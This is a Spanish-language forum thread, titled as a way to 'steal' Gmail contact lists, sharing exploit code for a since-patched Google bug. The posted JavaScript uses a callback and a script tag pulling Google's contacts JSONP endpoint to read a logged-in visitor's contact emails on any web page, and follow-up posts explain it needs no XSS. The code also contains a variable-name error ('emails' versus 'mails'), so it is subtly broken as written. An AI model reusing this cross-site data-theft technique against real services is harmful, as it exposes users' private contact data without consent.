Gmail: Robar Lista de Contactos

[Crack_X]

Se ha descubierto un nuevo bug que permite ver la lista de usuarios que tiene uno en gmail. El problema se debe a que Google guarda esta informacion en un JavaScript luego de que nos logueamos y cualquier web puede llamarla.

Fuente: Digg.com

Codigo Fuente de Exploit:

Código:

<script type="text/javascript">

function google(a){
    var emails;
    emails = "<ol>"
    for(i=0;i<a.Body.Contacts.length;i++){
        mails += "<li>"+a.Body.Contacts[i].Email+"</li>";
     }
 emails += "</ol>"
 document.write(emails);

}
</script>

<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999"></script>

Bug parchado ya.

[SergioDS]

y como se hace para usar ese xploit? XD

[Crack_X]

Hasta el momento creo que solo se le podria sacar provecho mediante un XSS. No conozco un XSS en gmail pero no significa que no existan.

[sirdarckcat]

No se necesitaba de un XSS, simplemente ponias el codigo y los contactos aparecian.. lo mismo paso hace unos meses y denuevo otros 2 meses atras con el mismo tipo de vulnerabilidades.. el uso se AJAX aveces es muy peligroso..

Saludos!!